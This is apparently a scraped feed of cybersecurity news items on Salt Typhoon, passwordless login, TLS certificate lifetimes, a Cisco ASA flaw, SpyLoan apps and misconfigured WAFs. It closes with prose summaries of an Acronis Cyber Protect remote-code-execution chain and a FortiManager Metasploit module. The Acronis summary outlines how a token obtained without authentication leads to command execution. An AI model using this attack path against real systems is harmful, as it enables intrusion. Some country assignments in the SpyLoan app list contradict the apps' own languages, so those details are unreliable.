PRESS RELEASE

Washington, D.C. – U.S. Senator Ron Wyden, D-Ore., and Senator Eric Schmitt, R-Mo., called for the Defense Department’s top watchdog to investigate the Pentagon’s failure to secure its communications from foreign spies, following the devastating “Salt Typhoon” hack of major telecom companies by Chinese government hackers.  

In a letter to Department of Defense Inspector General Robert Storch, Wyden and Schmitt highlighted the DOD’s failure to secure its communications from foreign spies. The senators revealed that DOD informed Congress that it signed a major contract this year, worth up to $2.7 billion, for wireless phone services for U.S. military personnel, even though DOD knew that the phone companies’ networks were vulnerable to foreign surveillance. 

Last month, the FBI and the Cybersecurity and Infrastructure Security Agency confirmed hackers working for the Chinese government breached multiple telecommunications companies and targeted call information for President-elect Trump, Vice President-elect Vance and Senate Majority Leader Schumer, among other high-profile targets.

“DOD’s failure to secure its unclassified voice, video, and text communications with end-to-end encryption technology has left it needlessly vulnerable to foreign espionage. Moreover, although DOD is among the largest buyers of wireless telephone service in the United States, it has failed to use its purchasing power to require cyber defenses and accountability from wireless carriers,” Wyden and Schmitt wrote. “We urge you to investigate DOD’s failure to secure its communications, and to recommend the changes in policy necessary to protect DOD communications from foreign adversaries.”

Wyden and Schmitt revealed multiple concerning new details about DOD’s inability and unwillingness to protect soldiers and civilian employees who rely on wireless phone networks, in their letter today: 

*   DOD has requested copies of independent, third-party cybersecurity audits phone carriers commissioned for their networks, but the carriers refused to produce those audits, citing attorney-client privilege, according to DOD.
    
*   DOD is still evaluating whether it has authority conduct its own cybersecurity audits of carriers that serve the Pentagon.
    
*   In August, DOD claimed that unencrypted phone lines did not pose an unnecessary risk and declined to adopt a policy banning use of unencrypted phone lines by DOD personnel. 
    

Read the full letter here.

You May Also Like

Wyden and Schmitt Call for Investigation of Pentagon's Phone Systems

Explore the transition from passwords to a passwordless future: enhanced security, convenience, and cutting-edge innovations in biometrics and…

Explore the transition from passwords to a passwordless future: enhanced security, convenience, and cutting-edge innovations in biometrics and hardware keys revolutionize online authentication.

Passwords have been our digital gatekeepers for decades, securing access to everything from email and bank accounts to social media profiles. Those combinations of text and digits evolved from simple words to complex strings.

However, with technological advancement, cybersecurity threats get more sophisticated, and the limitations of passwords are highly visible. The future seems to have transformed toward a passwordless world with higher security and ease.

****A Brief History of Passwords****

Passwords are far from a modern invention. Historically, they were used to protect physical access to confidential information, with guards asking for a “password” as proof of identity. As revealed by Private Internet Access (PIA), passwords were first introduced in 1961 with the Compatible Time-Sharing System (CTSS) at MIT. In the computer age, this concept was developed to protect online accounts. Initially, passwords were straightforward, like a pet’s name or a favourite number.

With the fast development of the internet, cyberattacks were found to pose a greater challenge. Thus, to strengthen security, complexity requirements were made compulsory, where uppercase and lowercase letters, numbers, and special characters were used. However, enhanced passwords were still subjected to brute-force attacks and phishing scams.

****Password Problem: Enduring Threats****

Passwords may have been the center of internet security, but they also carry some threats, such as:

**Weak Passwords:** Users often choose weak passwords to make life easy. The most commonly hacked passwords and passwords that always top the most commonly hacked passwords list include “123456” or “password.” Private Internet Access (PIA) research showed that 12345 is still the most used password. 

**Reuse Across Platforms:** Many users reuse passwords across multiple accounts. When one account is compromised, all other accounts using this password also fall into the hands of a hacker.

**High-Profile Data Breaches:** Among other issues, poor password hygiene has been responsible for some of the biggest data breaches in history:

*   **Equifax Data Breach:** Hackers took advantage of a vulnerability in Equifax’s web application to expose sensitive data from millions of people.
*   **Yahoo Data Breach:** Weak security practices that include compromised passwords lead to billions of accounts being breached.

These incidents show the need for something much more secure and dependable.

****The Rise of Passwordless Authentication****

In identifying the weaknesses of passwords, most technology companies are promoting the no-password era. In this method, a traditional password is not required because some advanced technologies are utilized to authenticate identity securely.

****What are Passwordless Authentication?****

Biometric authentication-based passwordless systems mostly rely on hardware security keys to provide access. Instead of remembering complicated strings, users can authenticate themselves without any hassle through devices or unique biological characteristics.

****Companies Leading the Charge****

Here are some of the mainstays pushing forward in passwordless authentication:

*   **Microsoft:** In biometric and hardware security innovation, Microsoft leads the charge. Now, the company is putting these technologies into its array of products and services. As part of a larger vision for a secure digital ecosystem, this commitment to eliminating passwords supports the very idea.
*   **Google****:** Google has invested a lot in passwordless solutions, where one can log in through fingerprint scanning and facial recognition. Their efforts aim at authenticated procedures that are not only secure but also friendly to the user.
*   **Apple:** Apple has been advocating biometric security and applied this in its devices with Touch ID and Face ID. These have set standards for secure and seamless authentication.

****Expert Opinion on Passwordless Future****

The idea of a passwordless future has found proponents in major tech personalities:

**Bill Gates –** One of the co-founders of Microsoft, he predicted a long time ago that passwords would eventually be done away with and replaced by something much more secure but convenient.

**Sundar Pichai –** He is the current CEO of Alphabet and Google. Has highlighted how security measures, including passwordless authentication, are now critical to safeguarding users in this ever-connected world.

****Benefits of a Password-Free World****

Getting over passwords has many benefits:

*   **Increased Security:** Passwordless systems keep vulnerabilities such as phishing and brute-force attacks out since there’s no way to steal or guess passwords.
*   **Convenience:** Biometric authentication and security keys speed up login times and simplify the user experience.
*   **Less Administrative Overhead:** The need to reset forgotten passwords and recover lost accounts can be a huge overhead for organizations in terms of costs incurred.

****Transition Issues****

Even though the benefits are attractive, migrating to a passwordless system is not without its problems:

Passwordless systems will fail without universal implementation; cooperation by internet technology organizations, financial institutions, and application software developers will be required to set global standards.

*   **Legacy Systems:** Many legacy systems are deeply embedded with password-based authentication. Changing these infrastructures will need a significant amount of investment and work.
*   **Device Security:** Passwordless relies much on the security of the device of the user. In case a device is lost or compromised, with authentication methods such as biometrics, it may also expose users. Strong device security best practices remain critical.

****Innovative Authentication Method****

Two primary technologies shape the passwordless future:

1.  **Biometric Authentication**

Biometric authentication approaches rely on physical characteristics, which uniquely identify a person. The most common biometrics are:

*   **Fingerprint Scanner:** Many smartphones and laptops include this function, making it fast and convenient for authentication purposes.
*   **Facial Recognition:** High-tech algorithms process faces to authenticate, Apple’s Face ID being the best example.
*   **Voice recognition:** The latest approach gaining popularity for hands-free authentications 

2.  **Hardware Security Keys**

These physical devices are digital keys, which connect to a computer or smartphone in order to authenticate users. They are particularly effective against phishing and other cyberattacks.

****What Lies Ahead for Internet Security?****

As passwordless technologies mature further, we might experience innovations.

*   **Behavioural** Biometrics: The system analyzes unique behaviours, such as typing speed or mouse movements, to verify identity.

*   **Blockchain-Based Authentication:** Decentralized systems may provide secure and tamper-proof identity verification.

To achieve this password-free world, both the business and consumer markets must evolve. Organizations should invest in safe authentication technology, while users have to remain vigilant and informed about new security practices.

****Coming to a Passwordless Future****

The age of passwords is nearing its end. As cyber threats evolve, traditional methods of authentication are proving inadequate. Passwordless authentication, led by advancements in biometrics and hardware security, offers a promising solution to the challenges of online security.

While it will not be smooth sailing into this new age, there can be no doubt that the rewards offered are, enhanced security, an improved user experience, and reduced administrative burden. Through these innovations, we can walk with confidence into a future safe and easy to navigate our online life.

1.  Google Makes Passkeys Default for All Users
2.  Why Browser Security Matters More Than You Think
3.  WordPress Mandates 2FA and SVN Passwords for Plugins
4.  Pop Culture Passwords Most Likely to Get You Hacked, Study
5.  Center Identity Launches Patented Passwordless Authentication

Are We on the Brink of Saying Goodbye to Passwords?

Proposals from Google and Apple drastically reduce the life cycle of certificates, which should mean more oversight — and hopefully better control.

Source: ArtemisDiana via Alamy Stock Photo

Shortening the life cycle of Transport Layer Security (TLS) certificates can significantly reduce the vulnerability of websites and hardware devices that require these certificates. TLS certificates are exchanged between Web server and Web client (or server to server) to establish a secure connection and safeguard sensitive data. The majority of today's digital certificates have a time-to-live of 398 days — that's a 365-day certificate with a 33-day grace period, equaling 398 actual days before the certificate expires. If the proposals from Google and Apple are approved, however, that life cycle could drop to 100 days (90 days plus a grace period) or even 47 days (30 days plus a grace period).

It is not unusual to find certificates as short as 10 days or less in DevOps environments, says Jason Soroko, a senior fellow and CTO at Sectigo. Shorter lives are set because the number of days a certificate is live increases the possibility that data will be lost if the certificate is compromised. An expired certificate can lead to denying a browser connection, effectively interrupting the breach and stopping data exfiltration.

**Automated Updates Make Change Easier**

Despite the marked change in how often digital certificates will renew, not much will change operationally for organizations that currently rely on security information and event management (SIEM); security orchestration, automation, and response (SOAR); or some other method for automating the renewal of such certificates, a common setup. In fact, Soroko says, certificate life cycle management (CLM) logs feed into the organization's SIEM and SOAR systems to ensure that the certificates are updated before they expire, which creates business continuity.

Many small to midsize businesses (SMBs) that employ a service provider to manage their networks and network security might already be getting automated certificate updates through CLM services. Organizations using managed service providers or managed security service providers should ask them whether such updates are in place. CLM manages contracts from initiation through renewal. Using CLM software to automate processes can help limit organizational liability and improve compliance with legal requirements.

The only groups that could be significantly affected operationally are those that still manually update certificates. Each time a certificate needs manual updating, errors could be introduced, Soroko says. Instead of the annual updates done today, a 30-day certificate (plus its proposed 17-day grace period) would require 12 updates annually, a multiplier of 12 in introducing errors and increasing risk.

"For smaller companies that don't have unlimited resources to manage their infrastructure, it's going to be quite a wake-up call," says Arvid Vermote, GlobalSign's worldwide CIO and CISO, a Brussels-based certificate and identification authority. "In the past, \[certificate authorities\] have been advocating automation. They have been providing the tools. But why change if it's not needed?"

As the certificates' time to live gradually shrinks, companies doing a manual process will soon realize that automation is not only a quicker way but also a more reliable way to renew certificates.

Updating certificates manually is not easy, Soroko notes.

"It's a very technical task, and it's not difficult to fat-finger it and make an error that takes a website down," he says, adding that most larger enterprises could not afford to have downtime on their Web assets, so they started to deploy CLM rather than manual updates years ago.

Regardless of the size of the company, Soroko says, the organization should automate updates. The technology is "ideally suited for everyone, and not just handing you a cert, but handing you visibility, automation, and discovery of \[digital\] certificates you don't even know you have," he says.

**CLM Casts Light on Shadow IT**

The frequent rotation of certificates means the CLM system will be scanning your environment often for certificates to update — possibly even finding digital certificates the IT department did not have on record, Soroko adds. This happens sometimes when enterprise department heads with signing authority to purchase services acquire software-as-a-service applications and Web services to address operational needs but do not report these services to the IT team.

With rogue applications running on virtual machines, Web servers, load balancers, and other hardware, it can be difficult to identify all elements of shadow IT. However, having the CLM systems constantly monitoring certificates can help identify new hardware, virtual servers, and cloud instances requiring digital certificates that might have been overlooked in the past. A certificate on an unknown device or virtual machine might be identified as an unauthorized connection or breach in progress.

The change in certificate life cycles likely will affect SMBs the most, Vermote says. In fact, this could be a good time for the CISO to go to the board and request funding for automation if they do not already have it.

"\[The\] CISO only gets money from the board if there is an incident," Vermote notes. "CIOs only get money from the board when systems are unavailable. In this case, it's both, because if the board doesn't give them the funding to properly automate and inventories of certificates expire, websites \[and\] legitimate services provided to customers, internal or external, will become unavailable."

Justin Lam, an analyst with 451 Research, says enterprises need to look at digital certificates from a proactive risk management perspective rather than a reactive compliance perspective. While certificates with a longer life always could be revoked in the case of a breach or incident, shorter life cycles mean there is more oversight — and hopefully better control — of certificates that IT might not have been made aware of.

"Many security professionals do not actually own the environments where these things are protected," Lam says.

And while managing all of the tools for cloud security posture management, zero trust, cloud-native application protection, and other security tools falls under the auspices of the CISO, many CISOs do not know when cloud sessions that require digital certificates are spun up. They have the responsibility to defend their networks but not necessarily the visibility into those networks — or the funding to protect everything.

**About the Author**

Contributing Writer

Stephen Lawton is a veteran journalist and cybersecurity subject matter expert who has been covering cybersecurity and business continuity for more than 30 years. He was named a Global Top 25 Data Expert for 2023 and a Global Top 20 Cybersecurity Expert for 2022. Stephen spent more than a decade with SC Magazine/SC Media/CyberRisk Alliance, where he served as editorial director of the content lab. Earlier he was chief editor for several national and regional award-winning publications, including MicroTimes and Digital News & Review. Stephen is the founder and senior consultant of the media and technology firm AFAB Consulting LLC. You can reach him at \[email protected\].

Digital Certificates With Shorter Lifespans Reduce Security Vulnerabilities

The vulnerability was first identified in 2014.

****SUMMARY:****

*   **Critical Patch Alert:** Cisco ASA users must urgently address a 10-year-old WebVPN vulnerability (CVE-2014-2120) that attackers are now actively exploiting.

*   **XSS Risk Identified:** The flaw allows unauthenticated attackers to perform cross-site scripting (XSS) attacks via malicious links, potentially compromising sensitive data and injecting malware.

*   **Active Exploitation:** Recent reports highlight that malware like AndroxGh0st is leveraging CVE-2014-2120, prompting Cisco to update its advisory in November 2024.

*   **Government Action Required:** CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalogue, mandating federal agencies to patch it by December 3, 2024.

*   **No Workaround Available:** Upgrading the Cisco ASA software to a patched version is the only solution—reach out to Cisco support or service providers to secure your network.

If you are using a Cisco Adaptive Security Appliance (ASA) for your network security, it is time to patch a critical vulnerability that’s been around, surprisingly, for ten years.

Cisco recently updated an advisory about a security flaw in the WebVPN login page of their ASA software, which can allow an unauthenticated, remote attacker to execute a cross-site scripting (XSS) attack on anyone using WebVPN on the Cisco ASA.

This vulnerability, tracked as CVE-2014-2120, is a medium-severity vulnerability caused due to insufficient input validation of a parameter, which could be exploited by convincing a user to access a malicious link. Clicking this link can force them into giving away sensitive information, hijacking browsing sessions, or even injecting malware. 

The vulnerability itself isn’t new – Cisco originally issued a warning back in March 2014. However, the company’s recent update highlights a concerning development: attackers are actively trying to exploit this decade-old bug. 

In November 2024, the Cisco Product Security Incident Response Team (PSIRT) identified this emerging pattern of new exploitation attempts. This coincides with a report from security firm CloudSEK, which revealed that malware called AndroxGh0st is using CVE-2014-2120 (among others) to spread.

It is worth noting that CISA added CVE-2014-2120 to its KEV (Known Exploited Vulnerabilities) catalogue on November 12, requiring government agencies to address it by December 3, 2024.

The re-exploitation of this flaw shows the need for timely software updates and security patches. Unfortunately, there’s no quick fix or workaround for this vulnerability. Your only protection is to upgrade your Cisco ASA software to a version that includes a patch. Don’t wait – contact your Cisco support channel and get the update process rolling. Upgrading is crucial to ensure your network remains secure. 

Customers with Cisco products that are provided or maintained through agreements with third-party support organizations like Cisco Partner/resellers/service providers should consult their service providers to identify the best workaround or fix for their networks before deployment.

Jason Soroko, Senior Fellow at Sectigo, a Scottsdale, Arizona-based provider of comprehensive certificate lifecycle management (CLM) weighed in on the situation stating, _“_These attacks highlight how technical debt and low cybersecurity maturity can compound risk. Many organizations struggle with basic cybersecurity capabilities, leaving them vulnerable to both historical and emerging threats._“_

_“_If adversaries can exploit older flaws, they will. Addressing the risks associated with legacy systems is imperative, however, it demands investments that many organizations lack the resources to make,_”_ Jason explained.

1.  **Decade Old Software Bug Sets 3000 US Prisoners Free**
2.  **Goldoon Botnet Exploits 9-Year-Old Flaw on D-Link Devices**
3.  **7-Year-Old Pre-Installed Google Pixel App Flaw Risks Millions**
4.  **Intel Broker Cisco Breach: Selling Stolen Data from Major Firms**
5.  **Cisco Web UI Flaw Exploited Massly, Impacting Over 40K Devices  
    **

Cisco Urges Immediate Patch for Decade-Old WebVPN Vulnerability

BCID mitigates the risk of consumers being harmed by fraud and bad actors by vetting to deliver a trusted, branded call experience for consumers.

Source: Andrey Suslov via Alamy Stock Photo

NEWS BRIEF

In an effort to convince consumers that it's safe to answer their phones, root of trust provider SecureG has partnered with CTIA, a trade association that represents the wireless communications industry, on an initiative intended to deliver a secure branded call experience for businesses.

Branded Calling ID (BCID) is an industry-led, standards-based Rich Call Data project to create a secure, interoperable ecosystem in which businesses can embed information like their logos and reason for calling when they reach out to consumers by phone. BCID digital signatures are secured by SecureG's public key infrastructure (PKI) solutions. 

"No one wants to answer their phone because of all the spam and scams, and it is only getting worse now that AI-generated voices can impersonate people and businesses," said Todd Warble, CTO of SecureG, in a statement. BCID has a secure-by-design foundation that enables consumers to trust the authenticity of the brands and intentions of the caller, Warble said.

To secure the caller's brand identity, SecureG provides high-assurance operations of the CTIA Secure Telephone Identity Certification Authority (CTIA STI-CA), Intermediate Certification Authority, and the Certificate Repository. The SecureG trust anchors, secured in hardened concrete bunkers, give BDIC the ability to authenticate participants to sign calls. The BCID system is designed to work across networks and mobile phones, and enterprise customers pay only for branded calls that are confirmed delivered. 

BCID allows businesses to brand their calls while preventing scammers and spammers from gaining access to NCID signing certificate. BCID is designed to work seamlessly across networks and mobile phones, so enterprise businesses can deliver trusted, branded calls to their consumers.

The initiative is aimed at reducing the risk of fraud and spam calls from bad actors who impersonate real businesses. A recent survey found that three-quarters of respondents would answer a call if the caller was authenticated by a name, logo, or reason for the call, the company said in a statement. BCID mitigates the risk of consumers being harmed by fraud and bad actors by vetting to deliver a trusted, branded call experience for consumers.

**About the Author**

Contributing Writer

Jennifer Lawinski is a writer and editor with more than 20 years experience in media, covering a wide range of topics including business, news, culture, science, technology and cybersecurity. After earning a Master's degree in Journalism from Boston University, she started her career as a beat reporter for The Daily News of Newburyport. She has since written for a variety of publications including CNN, Fox News, Tech Target, CRN, CIO Insight, MSN News and Live Science. She lives in Brooklyn with her partner and two cats.

SecureG, CTIA Project Secures Business Phone Calls

SUMMARY Cybercriminals are exploiting SpyLoan, or predatory loan apps, to target unsuspecting users globally. McAfee cybersecurity researchers report…

****SUMMARY****

*   **SpyLoan Rise:** SpyLoan apps have increased by 75% between Q2 and Q3 2024, targeting users globally.

*   **Play Store Threat:** 15 malicious loan apps on Google Play have been downloaded over 8 million times.

*   **How They Work:** These apps lure users with fake loan offers, harvest sensitive data, and exploit victims financially.

*   **Global Impact:** High prevalence reported in India, Mexico, the Philippines, Kenya, and seven other countries.

*   **Staying Safe:** Users should research apps, avoid granting excessive permissions, and use antivirus software.

Cybercriminals are exploiting SpyLoan, or predatory loan apps, to target unsuspecting users globally. McAfee cybersecurity researchers report a whopping 75% rise in SpyLoan apps and infected devices between Q2 and Q3 of 2024. These apps lure users with promises of quick, hassle-free loans but are designed to harvest sensitive data, resulting in extortion, harassment, and financial losses.

This increase can be understood by the fact that researchers spotted 15 such apps on the official Google Play Store with over 8 million installations worldwide. These apps, especially targeting users in South America, Southern Asia, and Africa, use social engineering tactics to trick users into providing sensitive information and granting excessive permissions.

Malicious apps (Credit: McAfee)

Here’s a list of malicious PayLoan apps found on the Google Play Store:

1.  **Préstamo Seguro-Rápido, seguro** – Downloads 1M, Country: Mexico – Deleted
2.  **Préstamo Rápido-Credit Easy** – Downloads 1M, Country: Colombia – Available
3.  **ได้บาทง่ายๆ-สินเชื่อด่วน** – Downloads: 1M, Country: Senegal – Available
4.  **RupiahKilat-Dana cair** – Downloads: 1M, Country: Senegal – Available
5.  **ยืมอย่างมีความสุข – เงินกู้** – Downloads: 1M, Country: Thailand – Deleted
6.  **เงินมีความสุข – สินเชื่อด่วน** – Downloads: 1M, Country: Thailand – Deleted
7.  **KreditKu-Uang Online** – Downloads: 500K, Country: Indonesia – Deleted
8.  **Dana Kilat-Pinjaman kecil** – Downloads: 500K, Country: Indonesia – Available
9.  **Cash Loan-Vay tiền** – Downloads: 100K, Country: Vietnam – Available
10.  **RapidFinance** – Downloads: 100K, Country: Tanzania – Deleted
11.  **PrêtPourVous** – Downloads: 100K, Country: Senegal – Deleted
12.  **Huayna Money – Préstamo Rápido** – Downloads: 100K, Country: Peru – Deleted
13.  **IPréstamos: Rápido Crédito** – Downloads: 100K, Country: Chile – Available
14.  **ConseguirSol-Dinero Rápido** – Downloads: 100K, Country: Peru – Deleted
15.  **ÉcoPrêt Prêt En Ligne** – Downloads: 50K, Country: Thailand – Available

****How SpyLoan Apps Work****

These apps operate by using a common framework to encrypt and exfiltrate data from a victim’s device to a command and control (C2) server. They often use deceptive marketing, mimicking reputable financial institutions, and are promoted through social media ads. Once installed, they request unnecessary permissions, such as access to contacts, SMS, storage, and even a microphone or camera.

The apps then use a similar onboarding process, including a countdown timer to create a sense of urgency and require users to provide sensitive identification documents and personal information. This data is then exfiltrated and used for financial exploitation, including hidden fees and high interest rates, as well as privacy violations, such as data misuse and harassment.

The consequences of using these apps can be devastating. Users have reported receiving threatening calls and death threats, having personal photos and IDs misused, and experiencing emotional and psychological distress. In some cases, victims have even reported suicidal thoughts.

The threat of SpyLoan apps is not limited to a single region. They have been reported globally, with localized adaptations. India, Mexico, Philippines, Indonesia, Thailand, Kenya, Colombia, Vietnam, Chile, and Nigeria are among the top 10 countries with the highest prevalence of fake loan apps.

****Law Enforcement Actions****

While law enforcement agencies have taken action against some of these operations, the threat persists. In Peru, authorities raided a call center engaged in extortion and fake loan app operations, detaining over 300 individuals. In Chile, the commission for the financial market has highlighted tens of fraudulent credit applications distributed on Google Play.

****Protecting Yourself****

To avoid falling victim to these predatory loan apps, users must be cautious when downloading financial apps. Here are some tips:

*   Read reviews and check ratings
*   Research the app and its developer thoroughly
*   Be wary of apps that request excessive permissions
*   Use reputable antivirus software to detect and block malicious apps
*   Never provide sensitive information without verifying the app’s legitimacy

1.  New Tool DVa Detects and Removes Android Malware
2.  Scammers Using Fake Loan Apps for Money Laundering
3.  These 8 Apps on Play Store Contain Android/FakeApp Trojan
4.  “Scary” FakeCall Android Malware Captures Photos and OTPs
5.  Octo2 Android Malware Uses Fake NordVPN App to Infect Phones

15 SpyLoan Apps Found on Play Store Targeting Millions

Organizations that rely on their content delivery network provider for Web application firewall services may be inadvertently leaving themselves open to attack.

Source: ArtemisDiana via Shutterstock

Many organizations using Web application firewall (WAF) services from content delivery network (CDN) providers may be inadvertently leaving their back-end servers open to direct attacks over the Internet because of a common configuration error.

The problem is so pervasive that it affects nearly 40% of Fortune 100 companies leveraging their CDN providers for WAF services, according to researchers at Zafran who studied the cause and scope of the problem recently. Among the organizations that the researchers found susceptible to attacks included recognizable brands, including Chase, Visa, Intel, Berkshire Hathaway, and UnitedHealth.

**Pervasive Issue**

WAFs act as intermediaries between users and Web applications. They inspect traffic for a range of threats and block or filter anything deemed suspicious or matching known patterns of malicious activity. Many organizations have deployed WAFs in recent years to protect Web applications against vulnerabilities they haven't had time to patch.

Organizations have multiple options for deploying WAFs, including on-premises in the form of physical or virtual appliances. There are also cloud- and host-based WAFs.

In total, Zafran found some 2,028 domains belonging to 135 companies among the Fortune 1000 that contain at least one supposedly WAF-protected server that an attacker could directly access over the Internet to launch denial-of-service (DoS) attacks, distribute ransomware, and execute other malicious activities.

"The responsibility \[for\] the misconfiguration lies primarily \[with\] the customers of CDN/WAF providers," says Ben Seri, chief technology officer of Zafran. But CDN providers who offer WAF services share some responsibility as well for failing to offer customers proper risk avoidance measures and for not building their networks and services to circumvent misconfigurations in the first place, he says. 

The problem, as Seri explains it, has to do with organizations not adequately validating Web requests to back-end origin servers that host the actual content, applications, or data that users are trying to access.

**A Failure to Follow Best Practices**

With a CDN-integrated WAF service, the CDN provider — like a Cloudflare or an Akamai — provides the WAF as part of its edge infrastructure. All incoming traffic to an organization's Web applications is routed through the CDN's WAF — a reverse proxy server within the vendor's edge network. The reverse proxy identifies which back-end server or resource a particular Web request is intended for and then routes it there in an encrypted fashion. "This means that when a CDN service is used as a WAF, the web application it protects is open to Internet traffic and is expected to validate that it responds only to web traffic that originates from and by the CDN service," according to the Zafran blog post.

If the customer is using best practices, the IP address of the back-end server is something that only the customer and CDN provider would know. CDN providers also recommend that organizations add IP filtering mechanisms to ensure that only requests from the CDN provider's IP address range are permitted access to back-end servers. Other recommendations include using pre-shared digital secrets known only to the CDN provider and the back-end server as a validation mechanism, and using what is known as mutual TLS authentication to validate both the origin server and the CDN provider's proxy server.

These measures are effective in protecting back-end servers when implemented correctly. But what Zafran discovered was that many organizations have not adopted any of these recommended validation precautions, thereby leaving back-end servers directly accessible over the Internet. "It is a lack of validation in Web applications that are designed to be protected by a CDN/WAF that leaves them open to all Internet traffic," Seri says. "It is like having a private S3 bucket left open to the Internet as a public bucket. Only in this case, it is protected Web applications that are left open to the Internet, instead of allowing only inbound traffic from the CDN provider."

**Easy to Find**

Exacerbating the situation is the fact that the IP addresses of enterprise origin services are not as private as many assume, Zafran's researchers found. The security vendor pointed to certificate transparency (CT) logs as one example of a relatively easy place for attackers and researchers to discover all domains belonging to a specific organization. CT logs provide a publicly accessible record of all SSL/TLS certificates that certificate authorities issue to website operators and are meant to improve trust and accountability around certificate issuance. Unfortunately, they also provide a starting point for attackers to gather detailed information on all the domains and subdomains belonging to an organization, including those associated with critical back-end servers and services.

"The issue was discovered to be extremely widespread," Seri says. "From a random sample of Internet servers that were designed to be protected by Cloudflare, 13% were found to suffer from this misconfiguration. This means that, potentially, 13% of all domains protected by Cloudflare can be directly attacked." Unfortunately, CDN/WAF providers require the cooperation of their customers, who control their own load balancers and Web applications, to mitigate this threat, he adds. Zafran is contacting affected companies as well as impacted CDN/WAF providers to help them quickly identify the full extent of this misconfiguration and address it, Seri says.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Misconfigured WAFs Heighten DoS, Breach Risks

Companies today constantly look for ways to improve their work with customers and perform better overall. The transition…

Companies today constantly look for ways to improve their work with customers and perform better overall. The transition to a more digital approach has become important for businesses that want to stay ahead in the market. A big part of this change is using customer relationship management (CRM) systems. Salesforce is one of the top choices for CRMs because it offers a wide range of features that can be adapted to different industries. This article will explore how using Salesforce can help drive digital transformation in organizations.

****Understanding Digital Transformation****

Digital transformation involves integrating technology into various aspects of business operations to change how companies function and fundamentally provide value to customers. It encompasses a culture shift that requires organizations to question traditional approaches, test new technologies, and adjust to evolving market trends.

According to Skydog Ops, a Salesforce integration company, Salesforce hosts more than 150,000 customers worldwide including Apple, Amazon Web Service and Walmart Inc, showcasing productivity and enhanced customer satisfaction.

****The Significance of CRM Systems****

Customer Relationship Management (CRM) systems play a critical role in driving transformation initiatives by enabling businesses to manage interactions with current and prospective customers more efficiently. These tools assist companies in gathering and analyzing customer data to improve decision-making and tailor experiences. Through the use of CRM systems, businesses can optimize their operations, automate tasks, and cultivate meaningful connections with customers.

****Salesforce: A Leader in CRM Solutions****

Salesforce has emerged as a leader in the CRM industry with its range of cloud-based solutions designed for sales support, customer service, and other business needs. Among the platform’s functionalities are wide applications that help businesses organize customer information, analyze interactions, and gather valuable insights. These tools are customized to fit an organization’s goals during its digital transformation efforts.

****Enhancing Customer Experience****

One of the primary goals of digital transformation is to enhance the customer experience, and Salesforce aids in achieving this by enabling companies to offer personalized and seamless interactions across various platforms. Leveraging real-time customer data allows businesses to customize their marketing strategies, delivering relevant content and promotions. Furthermore, with Salesforce’s automation features, organizations can provide timely responses to customer queries, improving satisfaction and fostering customer loyalty.

**Streamlining Business Processes**

Integrating Salesforce into business operations can greatly improve efficiency by automating routine tasks and enabling employees to focus on strategic priorities instead of manual work such as data entry, reporting, or workflow management. This shift toward automation helps minimize errors and boosts productivity across the organization. These improvements align with the goals of digital transformation, which seek to enhance both efficiency and effectiveness.

****Data-Driven Decision Making****

In today’s digital age, data is a valuable asset, and Salesforce equips businesses with the tools to unlock its full potential. By utilizing the in-depth analytics and reporting tools provided by Salesforce, businesses can gain insights into customer behaviour, discover sales patterns, and identify market opportunities. This data-driven approach allows companies to make informed decisions, refine strategies, and highlight areas for improvement—ultimately leading to enhanced agility and adaptability in response to evolving market dynamics.

****Fostering Collaboration and Innovation****

Salesforce’s use of cloud technology promotes collaboration by improving communication between departments and sparking creativity through shared access to information and ideas across the organization. The ability to work together seamlessly helps foster innovation and drives organizational growth.

****Scalability and Flexibility****

As companies grow and evolve, their requirements change. Salesforce’s scalability allows businesses to adapt their CRM system to meet the demands of growth and shifting circumstances. The platform’s versatility enables organizations to integrate new functionalities and applications, tailoring the system to meet their specific needs. This flexibility ensures that Salesforce remains a valuable tool throughout the entire transformation process.

****Overcoming Implementation Challenges****

Implementing Salesforce comes with its own set of challenges that organizations must address. Proper planning and execution are essential to avoid setbacks. To ensure a smooth rollout, it’s important to evaluate business requirements, set clear goals, and provide adequate training for employees. Working with professionals or consultants can also make the process more efficient, allowing businesses to fully leverage the benefits of Salesforce.

****Conclusion****

The use of Salesforce is crucial in leading the digital evolution of businesses across various sectors. Its wide range of features, flexibility, and focus on customer satisfaction make it an effective tool for improving productivity, promoting creativity, and gaining a competitive advantage. By adopting Salesforce, organizations can unlock the full benefits of digital transformation and position themselves for long-term success in an increasingly digital world.

1.  A Look at the 4 Main Functionalities of NetSuite
2.  The Role of Artificial Intelligence in Lead Generation
3.  How to Find Success with the Salesforce Admin Exam
4.  Types of SaaS Applications: Categories and Examples
5.  Effective, and powerful tools for identifying site visitors

The Role of Salesforce Implementation in Digital Transformation

The Acronis Cyber Protect appliance, in its default configuration, allows the anonymous registration of new protect/backup agents on new endpoints. This API endpoint also generates bearer tokens which the agent then uses to authenticate to the appliance. As the management web console is running on the same port as the API for the agents, this bearer token is also valid for any actions on the web console. This allows an attacker with network access to the appliance to start the registration of a new agent, retrieve a bearer token that provides admin access to the available functions in the web console. The web console contains multiple possibilities to execute arbitrary commands on both the agents (e.g., via PreCommands for a backup) and also the appliance (e.g., via a Validation job on the agent of the appliance). These options can easily be set with the provided bearer token, which leads to a complete compromise of all agents and the appliance itself.

Acronis Cyber Protect/Backup Remote Code Execution

This Metasploit module exploits a missing authentication vulnerability affecting FortiManager and FortiManager Cloud devices to achieve unauthenticated RCE with root privileges. The vulnerable FortiManager versions are 7.6.0, 7.4.0 through 7.4.4, 7.2.0 through 7.2.7, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, and 6.2.0 through 6.2.12. The vulnerable FortiManager Cloud versions are 7.4.1 through 7.4.4, 7.2.1 through 7.2.7, 7.0.1 through 7.0.12, and 6.4 (all versions).

